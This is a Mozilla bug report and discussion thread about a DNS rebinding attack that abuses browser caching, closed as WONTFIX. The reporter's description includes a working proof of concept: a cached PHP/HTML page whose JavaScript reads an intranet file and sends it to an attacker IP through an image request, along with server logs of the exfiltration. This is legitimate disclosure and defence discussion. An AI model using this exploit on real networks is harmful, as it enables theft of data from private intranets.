Dns rebinding attack using cached resources

RESOLVED WONTFIX

Status

()

Core
Networking
RESOLVED WONTFIX
6 years ago
a year ago

People

(Reporter: Alok Menghrajani, Unassigned)

Tracking

({sec-low})

7 Branch
x86
Mac OS X
sec-low
Points:
---

Firefox Tracking Flags

(Not tracked)

Details

(Whiteboard: [sg:low] cross-browser issue, URL)

(Reporter)

Description

6 years ago
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:7.0) Gecko/20100101 Firefox/7.0
Build ID: 20110922153450

Steps to reproduce:

The following security vulnerability affects all browsers, including Firefox.

Please make sure to coordinate with me & other browser vendors before
publicly disclosing the contents of this vulnerability.


VULNERABILITY DETAILS
Browsers implement their own dns cache to prevent an attack known as dns
rebinding. I have found a way to circumvent this protection using cached
resources. I believe this bug exists in all browsers, and can be exploited
to access files on an intranet or localhost across firewall boundaries.

REPRODUCTION CASE
User A owns an IP address 1.2.3.4. User B has access to an intranet on
10.0.0.x. Let's imagine for simplicity sake that user A knows about a
secret file hosted on http://10.0.0.1/secret.txt

1. User A sets up a dns server (e.g. evil.com), which uses a round robin
policy to alternate between 1.2.3.4 and 10.0.0.1.

2. User A configures a web server on 1.2.3.4, which serves /sticky using a
"aggressive" cache headers. This file contains some javascript which will
try to fetch the secret file:

<?php
  // cache this page for a long time
  header('Expires: '.gmdate('D, d M Y H:i:s \G\M\T', time() +
365*24*60*60));
?><html><head></head><body>
<h1>This is a sticky page...</h1>
  <script>
    xhr=new XMLHttpRequest();
    // steal /secret.txt from the localhost
    xhr.open("GET", "/secret.txt", false);
    xhr.send();
    // send back the data
    img = new Image();
    img.src = 'http://1.2.3.4/?secret.txt='+xhr.response;
  </script>
</body></html>

3. User A configures his webserver to respond to any non existing file
with the string "n/a". User A needs to make sure that such responses do
not contain any cache directives.

4. User A gets user B to visit http://evil.com/sticky (an iframe on a
popular site would work).

Since /sticky gets cached, the browser will only ever request it once.

When the ajax request for /secret.txt gets fired, the browser will do a
dns resolution (once per browsing session). The first time this happens,
/secret.txt will be fetched from user A's server, no interesting data will
be returned. However, on the subsequent browser restart,
/secret.txt could resolve to 10.0.0.1, in which case user A will be able
to steal the data from user B's intranet.

(Note: this exploit becomes even more powerful if user A is able to
forcefully hang or crash user B's browser).

I was able to successfully exploit this on Chrome 14.0, Firefox 6.0 and
Safari 5.1 (all three on my Mac OS X).

This is what the logs look like on the server side:

** started browser, hit http://mydomain/sticky **
107.37.9.42 - - [27/Sep/2011:11:28:24 -0700] "GET /sticky HTTP/1.1"
200 235
107.37.9.42 - - [27/Sep/2011:11:28:24 -0700] "GET /secret.txt HTTP/1.1"
200 3
107.37.9.42 - - [27/Sep/2011:11:28:25 -0700] "GET /?secret.txt=n/a
HTTP/1.1" 200 -

** restarted browser, hit http://mydomain/sticky **
107.37.9.42 - - [27/Sep/2011:11:28:39 -0700] "GET /?secret.txt=ChuckNorris
HTTP/1.1" 200 -

A few more notes:

1. The current exploit ends up sending the wrong host headers to the
localhost server. This is something that can be dealt with using raw
sockets. However, the malicious site will not be able to get the cookies
to be sent for the intranet/localhost. This means any internal resource
which requires authentication remains protected.

2. It's unclear what's the best way to solve this issue. Browsers could
make an extra dns request when loading data from cache, and
make sure the cross domain policy remains enforced. However, if a domain
name is hosted on multiple ip addresses, doing so would reduce the cache
hit rate.

3. This bug exists in all browsers. We should coordinate to make sure all
browsers are fixed before disclosing this issue publicly.

Feel free to contact me at alok@fb.com or at 650-353 85 28.



Actual results:

the content of http://10.0.0.1/secret.txt was accessed by an external script.


Expected results:

Cross domain policy should have prevented this.
Whiteboard: [sg:high]
(Reporter)

Comment 1

6 years ago
Turns out Collin's paper on dns rebinding already mentioned this attack, back in 2007. Chrome won't fix this issue. I'm unsure what you guys are going to do...

In case you can access it, here is the chrome thread:
http://code.google.com/p/chromium/issues/detail?id=98357
Whiteboard: [sg:high] → [sg:high] cross-browser issue, coordinate disclosure
Status: UNCONFIRMED → NEW
Component: General → Networking
Ever confirmed: true
Product: Firefox → Core
QA Contact: general → networking
Alok, who on the Chrome team are you working with on this issue? I would like to contact them? Also, can you name your points of contact for MS, Apple, and Opera?

Comment 3

6 years ago
Brian, did you get any further on this issue? I cannot read the link from comment #1...

To avoid this, wouldn't we have to enforce that the current dns-record for the host is the same as when we fetched the cached entry (as indicated in comment #0)? Should be possible to implement this by attaching IP-address at load-time as metadata for the cache-entry and verify in nsCrossSiteListenerProxy::CheckRequestApproved() - might reduce cache-hit rate but only for cross-site requests, no..?
(Reporter)

Comment 4

6 years ago
As I mentioned previously on this thread, Chrome's response is won't fix.

I will need to look up the status with other browsers. I have not reported this issue to Opera.

Updated

6 years ago
Assignee: nobody → bjarne

Comment 5

6 years ago
I can reproduce this and can talk to Opera about it if nobody has done that yet.

The initial idea from comment #3 seems feasible although there is a (as always) complication in the details. Current thinking is as follows:

When loading "secret.txt" and after nsXMLHttpRequest::CheckChannelForCrossSiteRequest() has decided that this is a x-site request, we find the URI of our *principal*, look up its cache-entry (if any) and mark it to "contain" an cross-site request (e.g. by attaching the IP-address to cache meta-info). Upon subsequent retrieval, nsHttpChannel::CheckCache() can look for this meta-info and verify that it matches the current IP of the host. This will limit cache-misses to principals whose IP-address changes and also contains cross-site requests.

Comment 6

6 years ago
I'd be curious to know why Chrome decided not to fix this. Let's contact someone on the Chrome security team and see if they can fill us in, or let us access the bug. If they think the bug isn't worth fixing I wonder why they are continuing to hide it.
Adam, in the paper you co-wrote "Protecting Browsers from DNS Rebinding Attacks" [1], there is this statement: "To prevent this attack, objects in the cache must be retrieved by both URL and originating IP address. This degrades performance when the browser pins to a new IP address, which might occur when the host at the first IP address fails, the user starts a new browsing session, or the user’s network connectivity changes. These events are uncommon and are unlikely to impact performance significantly."

I am surprised by the last sentence quoted. I suspect that, at least in 2011, it is quite common for users' connectivity to change in such a way that performance would be impacted significantly--especially on mobile, but even with laptops. When people are travelling, I suspect it is both more likely that they would be impacted by such a change (because of geo-aware DNS) and more critical that the cache hit rate be as high as possible, as often the network you are on is very poor.

Note that there is no reason to have a same-IP restriction for cached resource retrieved over SSL. Instead, a same-public-key check should be done. A same-public-key check is more secure (AFAICT) AND would be better for the cache hit rate for most sites.

Note that the paper at [1] mentions *several* issues that (AFAICT) are may still be unaddressed in Firefox, besides this one.

[1] http://crypto.stanford.edu/dns/

Comment 8

6 years ago
> I am surprised by the last sentence quoted.

We don't have any data to back up that statement.  :)

Comment 9

6 years ago
I'd also recommend that Firefox not fix this issue.  It's not feasible for the browser to protect the user from DNS rebinding attacks.  Servers need to protect themselves by validating the Host header and firewalls need to protect themselves by preventing external names from resolving to internal IP addresses.

Comment 10

6 years ago
I think we should change the sg rating to sg:low and make this bug public while we decide whether or not we want to fix this. This clearly isn't sg:moderate or higher at this point and discussion will benefit from this being made public.

Updated

6 years ago
Assignee: bjarne → nobody
Group: core-security
http://www.adambarth.com/papers/2009/jackson-barth-bortz-shao-boneh-tweb.pdf

Updated

6 years ago
Whiteboard: [sg:high] cross-browser issue, coordinate disclosure → [sg:low] cross-browser issue
(Reporter)

Comment 12

6 years ago
while I understand that it's something browsers might not always be able to address, it would be nice if browsers tried to:
a) mitigate the risk as much as possible
b) help web developers understand that the solutions currently in place are only meant to block a subset of rebinding attacks and that the flaw needs to be addressed at a different level.

Adam: don't you think checking for same-public-key for resources retrieved over ssl would be a good thing?

Comment 13

6 years ago
> Adam: don't you think checking for same-public-key for resources retrieved over ssl would be a good thing?

That won't work for deployments that use a server farm with different public keys for each host, as required when using extended validation certificates.

To your larger question, in some cases providing less protection is actually better because it's clear whether the responsibilities lies.  Protecting against these attacks in the browser is infeasible.  Protecting against them at the server or at the firewall is pretty easy.
Keywords: sec-low
I'm going to bow to the reality of wontfix on this one; matching chromium.

The security model for the web requires https to enforce origin semantics.
Status: NEW → RESOLVED
Last Resolved: a year ago
Resolution: --- → WONTFIX
You need to log in before you can comment on or make changes to this bug.